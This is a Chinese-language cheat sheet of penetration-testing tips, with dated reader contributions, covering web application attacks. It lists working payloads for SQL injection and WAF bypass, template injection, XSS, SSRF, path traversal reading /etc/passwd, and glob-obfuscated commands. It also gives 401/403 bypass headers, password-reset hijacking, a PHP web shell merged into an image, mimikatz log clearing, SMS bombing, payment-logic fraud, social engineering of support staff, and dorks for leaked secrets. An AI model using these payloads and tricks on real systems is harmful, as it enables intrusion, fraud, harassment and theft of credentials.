滲透測試Tips
知己知彼,百戰不殆
1、如果提示缺少參數,如{msg:params error},可嘗使用字典模糊測試構造參數,進一步攻擊。
2、程序溢出,int最大值為2147483647,可嘗試使用該值進行整數溢出,觀察現象。
3、403,404響應不灰心,嘗試使用dirsearch等工具探測目錄。
4、驗證碼簡單繞過:重復使用,萬能驗證碼(0000,8888),空驗證碼,驗證碼可識別(可用PKAV HTTP Fuzzer工具識別等)
5、短信轟炸繞過:手機號前加+86有可能會繞過,手機號輸入郵箱,郵箱處輸入手機號
6、如果驗證碼有實效,可嘗試一段時間內重復發送獲取驗證碼,因為有實效,所以有可能會延長驗證碼的時長。
7、SQL注入時,如果數據庫是Mysql,可以嘗試使用&&替換and,如:' && '1'='1,' %26%26 '1'='1。
8、SQL注入時,如果數據庫是Mysql,waf過濾了=,可嘗試用like替代。如:and 1 like 1
9、JWT格式在http://jwt.calebb.net/可以解密,前提是要知道秘鑰,可以嘗試構造任意數據,看他會不會有報錯信息中攜帶秘鑰信息,可以通過https://github.com/firebase/php-jwt生成JWT。JWT格式header.payload.signature
10、如果開放了redis服務(1234端口),可以嘗試使用/actuator/redis/info語句看是否能讀取敏感信息,如:http://www.xxx.com:1234/actuator/redis/info
11、Gitlab平臺漏洞 - CVE-2020-10977
12、API接口處,可以自己構造參數,POST形式傳參,可以嘗試構造為JSON格式,記得添加content-type: application/json,一些可嘗試參數,page,size,id。
13、手機發送短信時間限制的話,可以在手機號前嘗試使用特殊字符,或空格。他的邏輯應該是這樣的,用戶輸入手機號——>后端判斷該手機號是否在30秒或者60秒內請求過——>如果沒有,判斷發送過來的手機號是夠是11位的純數字,如果不是,去掉非數字字符——>和數據庫中的手機號比對,是夠存在于數據庫中,如果存在那么向該手機發送驗證碼。
14、圖片驗證碼可設置為空,如:code=undefined
15、自動以驗證碼內容,觀察Cookie中,參數中是否有發送給用戶的內容,可以嘗試更改,可以構造釣魚鏈接。
16、模板注入,在{{xxx}}中輸入的命令參數可被執行,如:
www.baidu.com/{{1+1}}以Python為例,列出當前目錄下所有文件的Payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
17、信息收集,在搜狗搜索中選擇微信可以搜索相關企業相關公眾號資產。
18、在JS文件中搜索關鍵字API,Swagger UI等等,嘗試尋找API接口地址。
19、swagger接口常見路徑:
/swagger/ /api/swagger/ /swagger/ui/ /api/swagger/ui/ /swagger-ui.html/ /api/swagger-ui.html/ /user/swagger-ui.html/ /swagger/ui/ /api/swagger/ui/ /libs/swaggerui/ /api/swaggerui/ /swagger-resources/configuration/ui/ /swagger-resources/configuration/security/
20、swagger組件特征固定title:Swagger UI
21、403和401的繞過小技巧:
22、盲測目錄是否存在,如果存在該目錄可能會自動在URL末尾添加/補全。
23、Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0
24、獲取賬號:文庫,QQ群,github泄露,借/租/買賬號。
25、如果泄露阿里云的 AKSK,可以使用AKSKtools工具進一步利用。https://xz.aliyun.com/t/8429
26、如果遇見后臺頁面一閃而過,接著讓你登錄,一般使用了權限認證方式,可以用一下方式進行繞過,或者遇見401,403,302,都可以嘗試使用以下方法:
一、GET /xxx HTTP/1.1 à403 Host: test.com 繞過: GET /xxx HTTP/1.1 à200 Host: test.com X-Original-URL: /xxx 二、GET /xxx HTTP/1.1 à403 Host: test.com 繞過: GET /xxx HTTP/1.1 à200 Host: test.com Referer: http://test.com/xxx 三、302跳轉:攔截并drop跳轉的數據包,使其停留在當前頁面。 四、前端驗證:只需要刪掉對應的遮擋模塊,或者是驗證模塊的前端代碼。
27、gopher協議使用限制:
28、一款生成gopher協議payload的工具:
https://github.com/firebroo/sec_tools
29、Dict協議寫入流程:
1.寫入內容; dict://127.0.0.1:6379/set?test 2.設置保存路徑; dict://127.0.0.1:6379/config:set:dir:/tmp/ 3.設置保存文件名; dict://127.0.0.1:6379/config:set:dbfilename:1.png 4.保存。 dict://127.0.0.1:6379/save
30、CentOS 7系統利用suid提權獲取Root Shell
https://www.freebuf.com/articles/system/244627.html
31、xss中標簽利用的payload:
<a href=javascript:alert(1)>xxa>
32、XSS過濾了單引號,等號可以:
①、使用:String.fromCharCode(97,108,101,114,116,40,49,41);為alert(1),該方法輸出的結果為字符串,可以使用eval()進行執行,即彈框操作eval(String.fromCharCode(97,108,101,114,116,40,49,41));②、atob函數:eval(atob`YWxlcnQoMSk=`) 為 eval(atob`alert(1)`) 其中`為反引號
33、XSS過濾了單引號,等號以及圓括號,eval:
①、過濾了eval函數可以用其他函數去繞過,如:Function,constructor
Function`a${atob`YWxlcnQoMSk=`}```
``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```
34、可使用下面命令查看是否處在docker虛擬機中
cat /proc/1/cgroup
35、萬能密碼試試'=0#
36、CORS漏洞驗證,可以使用curl來驗證:
curl https://www.xxxx.com -H "Origin: https://test.com" -I檢查返回包的 Access-Control-Allow-Origin 字段是否為https://test.com
37、在盲測目標系統是否為Shiro時,可以在Cookie中手動構造rememebrMe=xxx,如果返回包中Set-Cookie中存在rememberMe=deleteMe,則證明該系統使用了Shiro,因此可以進一步攻擊。
38、使用正則獲取網站中所包含的其他URL:
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
39、常見的一些遠程命令執行(RCE)參數,詳情,請看dicts目錄下的RCE-extentions.txt文件。
40、繞過SSRF防護的幾個小方法:
A、繞過SSRF限制通過CIDR,如: http://127.127.127.127 http://127.0.0.0 B、不完整的地址,如: http://127.1 http://0 C、將地址結合在通過特殊字符結合在一起,如: http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3 D、繞過解析器,如: http://127.1.1.1:80\@127.2.2.2:80/ E、繞過localhost通過[::],如: http://[::]:80/ http://0000::1:80/
41、幾個常用的Google語法:
inurl:example.com intitle:"index of"inurl:example.com intitle:"index of /" "*key.pem"inurl:example.com ext:loginurl:example.com intitle:"index of" ext:sql|xls|xml|json|csvinurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
42、通過favicon的hash來對比相關聯的兩個網站:
腳本地址:https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py命令:python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
43、一些本地包含參數,詳情請看dicts目錄下的LFI-extentions.txt文件。
44、在JavaScript文件中可以找一些隱藏的GET參數,比如:
首先,在js文件中找到一些變量,比如:var test="xss" 然后,可以嘗試使用GET方法構造每一個參數,比如: https://example.com/?test=”xsstest 本方法可能會發現一些XSS
45、使用github dorks幫助我們尋找一些敏感信息,比如:
extension:pem privateextension:ppk privateextension:sql mysql dump passwordextension:json api.forecast.ioextension:json mongolab.comextension:yaml mongolab.comextension:ica [WFClient] Password=extension:avastlic “support.avast.com”extension:js jsforce conn.loginextension:json googleusercontent client_secret“target.com” send_keys“target.com” password“target.com” api_key“target.com” apikey“target.com” jira_password“target.com” root_password“target.com” access_token“target.com” config“target.com” client_secret“target.com” user auth通過上述語法,可以搜索到一些敏感的私鑰,一些SSH登錄私鑰,mysql的數據庫密碼,API key等等。另外推薦一個腳本:https://github.com/techgaun/github-dorks
46、SSRF常見的參數,詳情請看dicts目錄下的SSRF-extensions.txt文件。
47、通過添加.json后綴,泄露一些敏感信息,比如:
一次正常請求:GET /ResetPassword HTTP/1.1{"email":"victim@example.com"}響應:HTTP/1.1 200 OK
添加.json后綴的請求:GET /ResetPassword.json HTTP/1.1{"email":"victim@example.com"}響應:HTTP/1.1 200 OK{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}原鏈接:https://twitter.com/SalahHasoneh1/status/1293918353971531776
48、如果響應為401,可以試試在請求頭中添加X-Custom-IP-Authorization: 127.0.0.1
49、利用火絨劍,配合微信發語音的方式,可以獲取該人的登錄IP。
50、目錄穿越,敏感文件讀取一些Payload:
\..\WINDOWS\win.ini ..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ .?\.?\.?\etc\passwd ../../boot.ini %0a/bin/cat%20/etc/passwd \\'/bin/cat%20/etc/passwd\\' ..%c1%afetc%c1%afpasswd
51、在訪問admin路徑面板時可以通過添加%20,來繞過,具體如下:
target.com/admin –> HTTP 302 (重定向到登錄頁面) target.com/admin%20/ -> HTTP 200 OK target.com/%20admin%20/ -> HTTP 200 OK target.com/admin%20/page -> HTTP 200 OK
52、在重置密碼的地方,可以嘗試添加另外一個次要的賬號,比如,手機號,郵箱號等等,比如:
a、構造兩個參數:
email=victim@xyz.tld&email=hacker@xyz.tld
b、使用抄送方式:
email=victim@xyz.tld%0a%0dcc:hacker@xyz.tld
c、使用分隔符:
email=victim@xyz.tld,hacker@xyz.tld
email=victim@xyz.tld%20hacker@xyz.tld
email=victim@xyz.tld|hacker@xyz.tld
d、不使用域名:email=victim
e、不使用頂級域名:email=victim@xyz
f、JSON情況:
{"email":["victim@xyz.tld","hacker@xyz.tld"]}
53、如果有利用郵箱重置密碼功能的情況,而且還是JSON傳輸的情況下,使用SQLmap跑注入,可以將*(星號)放在@之前,比如:
{“email”:”test*@xxx.com”}或者在*(星號)這個地方進行手注原因大家可以看這里:https://tools.ietf.org/html/rfc3696#section-3
原文鏈接:https://www.infosecmatter.com/bug-bounty-tips-7-sep-27/#2_bypass_email_filter_leading_to_sql_injection_json
54、可以獲取目標站點的favicon.ico圖標的哈希值,然后配合shodan進行目標站點資產收集,因為每個目標站點的favicon.ico圖標的哈希值可能是固定值,因此可以通過該方法從shodan,fofa等等去尋找更多資產。簡單的用法:
#python 3import mmh3 import requestsimport codecsresponse = requests.get("https://www.baidu.com/favicon.ico")favicon = codecs.encode(response.content,"base64")hash = mmh3.hash(favicon)print(hash)
或使用下面這個github項目:https://github.com/devanshbatham/FavFreak
shodan搜索語句:http.favicon.hash:哈希值fofa搜索語句:icon_hash="-247388890"(但僅限于高級用戶使用)
原文鏈接:https://www.infosecmatter.com/bug-bounty-tips-8-oct-14/#8_database_of_500_favicon_hashes_favfreak
55、繞過403和401的小技巧:
a、添加以下請求頭,比如:X-Originating-IP, X-Remote-IP, X-Client-IP, X-Forwarded-For等等;有可能會有一些白名單IP地址可以訪問這些敏感數據。 b、如果使用GET方法訪問某些路徑,返回403,可以先訪問允許訪問的路徑,然后在請求頭中,添加下面的頭:X-Original-URL: /adminX-Override-URL: /adminX-Rewrite-URL: /admin c、可以使用下面這些Payload試試/accessible/..;/admin/.;/admin/admin;//admin/~/./admin/.//admin?param/%2e/admin/admin# 原文鏈接:https://www.infosecmatter.com/bug-bounty-tips-8-oct-14/#11_tips_on_bypassing_403_and_401_errors
56、如果訪問/.git目錄返回403,別忘了進一步訪問下面的目錄,比如:/.git/config
57、使用通配符繞過WAF,如果WAF攔截了RCE,LFI的payload,我們可以嘗試使用通配符來繞過,比如:
/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd? = 任意的單個字符* = 任意字符串,也包含置空的字符串通配符在常見的系統中都適用,另外我們可以使用$IFS特殊變量取代空白$IFS = 內部字段分隔符 = [space], [tab] 或者 [newline] cat /etc$u/p*s*wd$u 小例子,執行/bin/cat /etc/passwd的寫法:/*/?at$IFS/???/???swd/****/?at$IFS/???/*swd/****/?at$IFS/???/*******swd 原文地址:https://www.infosecmatter.com/bug-bounty-tips-9-nov-16/#8_waf_bypass_using_globbing
58、繞過403的一個BurpSuit插件,地址:
https://github.com/sting8k/BurpSuite_403Bypasser
59、SSRF bypass列表,基于localhost(127.0.0.1),如下:
http://127.1/http://0000::1:80/http://[::]:80/http://2130706433/http://whitelisted@127.0.0.1http://0x7f000001/http://017700000001http://0177.00.00.01http://?⑨。②⑤④。?⑨?②⑤④/http://???⑨?????????⑨?????:80/http://???⑨???⑨??:80/http://②⑧⑤②?③⑨①⑥⑥:80/http://④②⑤?⑤①??④②⑤?⑤①?:80/http://?②⑤①。?③⑦⑥。?②⑤①。?③⑦⑥:80/http://0xd8.0x3a.0xd6.0xe3http://0xd83ad6e3http://0xd8.0x3ad6e3http://0xd8.0x3a.0xd6e3http://0330.072.0326.0343http://000330.0000072.0000326.00000343http://033016553343http://3627734755http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37http://216.0x3a.00000000326.0xe3 原文鏈接:https://www.infosecmatter.com/bug-bounty-tips-10-dec-24/#13_ssrf_bypass_list_for_localhost_127001
60、對于Apache shiro的CVE-2020-17523的未授權訪問,是由于Spring+shiro結合造成的漏洞,可在路徑后面添加%20,嘗試訪問該路徑內容,造成未授權訪問操作。
61、在一些驗證碼登錄,找回密碼等地方需要輸入手機號,郵箱號的話,嘗試配合SQL注入聯合查詢方式,填寫可控手機號,實際情況實際分析。
62、密碼爆破不如意,試試"密碼噴灑攻擊(Password Spray Attack)"法,多來收集用戶名。
63、Exchange的下的目錄以及功能介紹:
/autoDiscover/ 自Exchange Server 2007開始推出的一項自動服務,用于自動配置用戶在Outlook中郵箱的相關設置,簡化用戶登陸使用郵箱的流程。/ecp/“Exchange Control Panel” Exchange管理中心,管理員用于管理組織中的Exchange的Web控制臺/eWS/“Exchange Web Services” Exchange Web Service,實現客戶端與服務端之間基于HTTP的SOAP交互/mapi/ Outlook連接Exchange的默認方式,在2013和2013之后開始使用,2010 sp2同樣支持/microsoft-Server-ActiveSync/ 用于移動應用程序訪問電子郵件 /OAB/“Offline Address Book” 用于為Outlook客戶端提供地址簿的副本,減輕Exchange的負擔/owa/“Outlook Web APP” Exchange owa 接口,用于通過web應用程序訪問郵件、日歷、任務和聯系人等/powerShell/ 用于服務器管理的Exchange管理控制臺 /Rpc/ 早期的Outlook還使用稱為Outlook Anywhere的RPC交互
64、針對于Exchange的賬號格式,可以嘗試:domain\username、domian.com\username、username
65、一個驗證域名是否使用了Exchange的腳本:https://github.com/vysecurity/checkO365
66、使用云函數的多出口特性,可以將其作為代理池來用。思路大概為:
流程:瀏覽器請求數據 -> 編寫代理 -> 通過代理將數據傳給api網關 -> api網關觸發云函數并將參數作為event傳入進云函數內 (然后反向流程將數據返回到瀏覽器中)所以我們大致編寫代碼步驟為:1、編寫云函數,使用api網關做觸發器,云函數主要處理api網關傳來的數據,再將訪問返回的數據包傳會給api網關2、編寫代理代碼,主要接收瀏覽器傳來的數據,并將數據整理傳給api網關,然后回到第一步。注:這是一個思路,具體實現不局限于此,各位大佬各顯神通吧~
67、常見的邏輯漏洞checklist
注冊:
短信轟炸/驗證碼安全問題/密碼爆破/郵箱轟炸 用戶任意注冊/批量注冊 枚舉用戶名 XSS (在這里的話其實就是說遇到框你就插xss即可)
登錄:
短信轟炸/驗證碼安全問題/密碼爆破/郵箱轟炸 SQL注入 撞庫 抓包把password字段修改成空值發送 認證憑證替換/比如返回的數據包中包含賬號,修改賬號就能登陸其他賬號 Cookie仿冒 修改返回包的相關數據,可能會登陸到其他的用戶
找回密碼:
短信郵箱轟炸/短信郵箱劫持 重置任意用戶密碼/驗證碼手機用戶未統一驗證 直接跳過驗證步驟
購買支付/充值(主要還是利用抓包需要仔細的去看每一個可用參數):
交易金額/數量修改,替換支付模塊 (這里也就是更換了支付的模塊金額**)** 交易信息訂單編碼/導致信息泄露 整數溢出,int最大值為2147483647,超過最大值 修改充值賬戶 支付繞過
抽獎活動:
刷獎品/積分 并發(同時執行,看是否會多次減少次數)
優惠券/代金券:
并發邏輯漏洞(burp或者fd批量獲取優惠劵等) 修改優惠券金額/數量
訂單信息:
訂單信息遍歷/泄露 訂單信息泄露導致用戶信息泄露 刪除他人訂單
會員系統:
修改個人信息上傳文件,上傳帶彈窗的html 如遇上上傳xlsx/docx,可能存在xxe,上傳惡意的文檔盲測 圖片上傳也可能遇到imagereagick命令執行,上傳惡意圖片 視頻上傳如果使用ffmpeg<3.2.4(視頻按幀分割成圖片),上傳惡意avi盲測ssrf 用戶橫向越權訪問/遍歷/導致用戶信息泄露 SQL注入/個人簡介處存儲XSS 個人信息注冊的名稱也可以插入xss
傳輸過程:
明文傳輸賬號密碼 修改信息處無session/token導致csrf POST/COOKIE注入
評論:
POST注入/存儲XSS 無session/token導致CSRF
68、常見的漏洞位置
驗證碼問題:
萬能驗證碼 返回包中存在驗證碼 刪除驗證碼或者cookie中的值可以爆破賬號密碼
短信轟炸:
一直重放刪除修改cookie,重放數據包遍歷參數發送數據包手機號后面加空格或者前面加其他的比如+86或者逗號分號等,然后重發數據包請求參數修改大小寫,或者添加請求參數比如&id=1一個站的登陸處可能做了防護,但是再找回密碼處可能沒有安全防護,或者在注冊流程中沒有安全防護,所以說多測試接口如果對手機號一天次數進行了限制的話,還可以在進行發送一次短信,DO intercept之后修改為成功回顯
水平越權:
主要登陸后還是修改參數,主要找到**多個接口**不斷測試關注網頁源代碼,有時候會有表單,但是被bidden(隱藏標簽)給隱藏起來了,可以修改返回包然后嘗試獲取數據檢測多個賬號,主要分析請求參數
數據泄露:
在找回密碼處,填寫數據后抓包查看返回信息,有可能存在敏感數據返回
任意用戶密碼重置:
目前大部分都是在修改密碼處參數修改 有些是前端驗證
69、支付邏輯漏洞
(該部分參考Freebuf文章,作者名字:聽聞他叫無劇)
1.邊界值問題 :正常的邏輯是用戶購買商品,然后價格累加得到一個總價進行扣款。這個時候就會產生邏輯問題:如果說用戶購買的商品是負數了,那么計算的總數就是負數。反過來錢給用戶 2.順序執行缺陷:正常的邏輯是a-b-c-d 循環漸進的進行流程操作。這個時候就會產生邏輯問題:可以直接從中繞過某一個過程進入到下一步操作。如果說有一項是支付的操作,那么也就會產生支付繞過,如果說有一項是驗證機制,就會繞過驗證直接進入下一步。 3.金額直接傳輸導致篡改:直接對下單的金額進行修改值,這里可以使用fd或者burp抓包 4.確定支付之后還可以加入購物車:把商品放入購物車點擊下單支付,會跳轉到微信,支付寶等第三方支付平臺。這個時候還可以繼續在購物車中加入商品,支付結束之后,商家發放的商品是現在的購物車里面的東西。 5.請求重放:購買成功之后,繼續重放請求,可以讓購買的商品一直增加。購買成功之后,會有一個銀行對商戶網站跳轉的過程,如果反復進行操作,有幾率會導致商品反復購買和增加,但是不需要付更多的錢。 6.請求參數干擾:金錢做了簽名認證之后,修改后不通過,但是在里面仍然會有一個參數對金額產生影響導致問題產生。 7.訂單替換:訂單替換發生在支付之后的事件處理,同時向服務器發起二次支付請求一個多一個少,支付金額少的,然后支付之后進行替換,告知服務器訂單支付完成,并且過程可以反復的回放。 8.欺詐:需要兩個收款人,一個是正常的商家,一個是偽造的商家 9.單位替換:產生在paypal類似的國際支付的場景。 10.用戶替換:在支付過程中發生用戶替換現象,首先登陸自己的賬戶,然后取得另外一個人的賬戶名等有效信息,在業務流程中用對方的用戶名替換自己的用戶名,用對方的余額購買完成后,再替換自己的賬戶名,這樣就形成別人的錢買自己的東西 11.強制攻擊:強制攻擊發生在暴力破解的情況下,如果一個商家運用一個自己的網店,接入第三方支付接口,由于設計上的不當導致商家與第三方支付約定的密鑰Key可以單獨被MD5加密,導致可以使用MD5碰撞技術對密鑰進行破解,攻擊者可以設計簡單的密鑰加密信息使得MD5加密是可以用MD5碰撞技術進行暴力破解。 12.秘鑰泄漏:內置支付功能的app為了設計上的方便有可能會把Md5或者是RSA的私鑰泄漏導致攻擊者反編譯apk之后獲取密鑰信息使得交易信息可以被篡改。 13.函數修改:apk反編譯之后的函數修改,可能導致商家在最后一步向支付方提交訂單時未驗證信息的準確性,仍然被篡改。 14.heart bleed:SSL(安全套接層)協議是使用最為普遍網站加密技術,而OpenSSL則是開源的 SSL 套件,為全球成千上萬的web服務器所使用。Web服務器正是通過它來將密鑰發送給訪客然后在雙方的連接之間對信息進行加密。URL中使用 https打頭的連接都采用了SSL加密技術。在線購物、網銀等活動均采用SSL技術來防止竊密及避免中間人攻擊。
2021年01月21日 - 更新分界線,整理了來自一些師傅們留言貢獻的滲透測試Tips:
1、至于登陸后臺的網站,如果有重置密碼功能,但被禁用了,可以找該公司技術qq群,假裝用戶忘記密碼,提重置密碼需求,讓開通功能,可以驗證下是否有任意密碼重置漏洞。Author By:六六
2、如果遇見后臺頁面一閃而過,接著讓你登錄,一般使用了權限認證方式: 三、302跳轉:攔截并drop跳轉的數據包,使其停留在當前頁面。這個操作我每次試都是不成功的,但是可以修改返回的302為200,然后刪除掉Location字段。Author By:Jokong
3、任意文件下載:/porc/self/cmdline --當前進程的cmdline參數,/var/lib/mlocate/mlocate.db --全文件路徑。Author By:phage
4、容易發生短信轟炸的幾個業務場景以及繞過方法:Author By:登登登Y
①:登錄處 ②:注冊處 ③:找回密碼處 ④:綁定處 ⑤:活動領取處 ⑥:獨特功能處 ⑦:反饋處一般繞過限制方法:手機號碼前后加空格,86,086,0086,+86,0,00,/r,/n, 以及特殊符號等修改cookie,變量,返回138888888889 12位經過短信網關取前11位,導致短信轟炸
5、注入的時候可以試試--%0a union --%0a select 嘗試繞過。Author By:zhaoze
6、注入的時候,多看order by,group by,{$var}。Author By:oops33
7、手機號前加若干+會造成短信轟炸。Author By:ptgeft
8、如果在旁站中發現短信驗證碼在response中出現,可以試試主站或者其他站點中驗證碼是否通用。Author By:Alex125
9、獲取短信驗證碼時,用逗號隔開兩個手機號,有可能兩個手機號能獲取到同一個驗證碼。Author By:Scorpion
2021年01月26日 - 更新分界線,整理了來自一些師傅們留言貢獻的滲透測試Tips:
1、測試注入 and ord(0x1) ->true,and ord(0x0) ->false。Author By:oops33
2、遇到文件讀取漏洞,除了讀取配置文件,還可以嘗試讀取網站文件,來進行代碼審計,說不定就有開發疏忽的漏洞在源代碼里。Author By:iwtbhero
3、使用python快速開啟http服務器:Author By:ffffffff0x
基于python2.x,命令如下: python -m SimpleHTTPServer 8000 # 在當前目錄起個 8000 端口的 HTTP 服務 基于python3.x,命令如下: python -m http.server 8000
4、滲透時盡量不要暴露自己的 IP 地址,掛代理是必須的。Author By:ffffffff0x
- linux 下要查看自己終端是否走代理可以 curl https://ifconfig.me/ 看下返回的 IP 地址
- windows 就直接訪問 https://ifconfig.me/ 即可
5、整理字典時,推薦用linux下的工具快速合并和去重。Author By:ffffffff0x
cat file1.txt file2.txt fileN.txt > out.txt sort out.txt | uniq > out2.txt
2021年01月29日 - 更新分界線,整理了來自一些師傅們留言貢獻的滲透測試Tips:
1、注入時使用url編碼對&&和||編碼可以繞過一些攔截。例如:Author By:jettt
1' and 1=1--+ 1' %26%26 True--+ 同理其他編碼也可以試一個遍。
2、信息收集的時候可以使用fofa查看證書看是否是真實IP 語法 cert="baidu.com"。Author By:zhaoze
3、將普通圖片1.jpg 和 木馬文件shell.php ,合并成木馬圖片2.jpg:Author By:Lstarx
$ copy /b 1,jpg+shell.php 2.jpg
4、mimikatz小功能:Author By:Rive丶
多用戶登錄3389:ts::multirdp 清除日志:event::drop 粘貼板信息:misc::clip
2021年02月04日 - 更新分界線,整理了來自一些師傅們留言貢獻的滲透測試Tips:
以下來自xinxin999師傅的貢獻:
1、{“id”:111} --> 401 Unauthriozied {“id”:[111]}-->200 OK {“id”:{“id”:111}} --> 200 OK {“id”:{“id”:[111]}} --> 200 OK
2、測試注入的時候,可以psot/get更換,自定義一些參數,刪除一些參數,加上分塊,以及burp有時候有這種口口符號,可以刪除在測payload。
3、wp的站,如果掃到,xmlrpc這個文件,我們可以借鑒這篇文章https://blog.csdn.net/u012206617/article/details/109002948
4、看見同行的馬,我們可以加一些參數讓其密碼溢出來。例如a.asp?profile=a
5、如果注入出的md5只有31位,可以去掉前8位和后8位,用中間的16位
以下來自Wafer師傅的貢獻:
6、快速web路徑,sql注入下找路徑。
dir /s /b e:\”Web.config" type e:\b2cexam\web.config
7、列出網站物理路徑
%systemroot%\system32\inetsrv\appcmd.exe list vdir
8、列出機器所有盤符(禁止訪問的盤無法獲取)
wmic logicaldisk where drivetype=3 get deviceid
以下來自lidasimida師傅的貢獻:
9、burpsuite的intruder模塊的爆破功能:
ssrf繞過舉例:http://127.0.0.1:0~65535, 有時間的話可以嘗試爆破多個端口來爆破,里面的地址也可以更改為已知確認的內網地址。還有就是http://127.0.0.1/a 的a目錄進行枚舉,有些是可以枚舉成功的,有些是枚舉不了的,這個a目錄最好為已知的403目錄,如果403繞不過去可以搜集為臨時字典,然后使用爆破。
目錄穿越繞過舉例:不一定是/../etc/password就可以繞過,建議可以配置字典,第一個為/..第二個為/../..以此類推來爆破,爆破還可以選中intruder——payloads——payload encoding,編碼爆破也是可以的,目錄穿越來爆破還是不錯的。
字典組合模塊:payloads——payload sets——custom iterator
10、dnslog外帶注入
shiro反序列化、fastjson反序列化、sql注入外帶注入、xss外帶注入、內網漫游(nginx的反向代理會導致內網漫游,在請求頭添加dnslog地址即可)
11、密碼解密小技巧
輸入同一個密碼多次抓包發現密碼固定值加密,可以搜集多個弱口令進行用戶名爆破
輸入同一個密碼多次抓包發現密碼不是固定值加密,可以將多組密碼對比,可能奇數位或偶數位一致,之前審計一組加密代碼發現,減去前4位和后8位共12位隨機數之后,再減去奇數位的隨機數,得到偶數位的編碼格式為base64編碼。(https://www.freebuf.com/articles/web/261440.html)
12、信息收集
置換請求頭,插件User-Agent switch,可以更改請求方式訪問Android、iPhone、ipad等可以訪問的頁面,可能會訪問到瀏覽器訪問不到的信息。
白馬單繞過插件:X-Forwarded-For Header,建議測試后關閉,有些網站你勾選了會無法正常訪問。
13、上傳的請求包有兩個請求參數同為php,修改其中一個為1.jpg,另外一個為1.php
將文件后綴做個編碼嘗試,看看后端會不會有解碼,或者單獨將文件后綴一個字母或兩個字母做編碼,編碼可以是十六進制、Unicode編碼、base64編碼單獨。
在1.jpg.php的.php前面插入多行換行符或者垃圾數據,插入多個/試試。文件后綴使用通配符*或者?或者其他。
14、 信息收集的時候可以使用fofa查看證書看是否是真實IP 語法 cert="baidu.com"。Author By:zhaoze
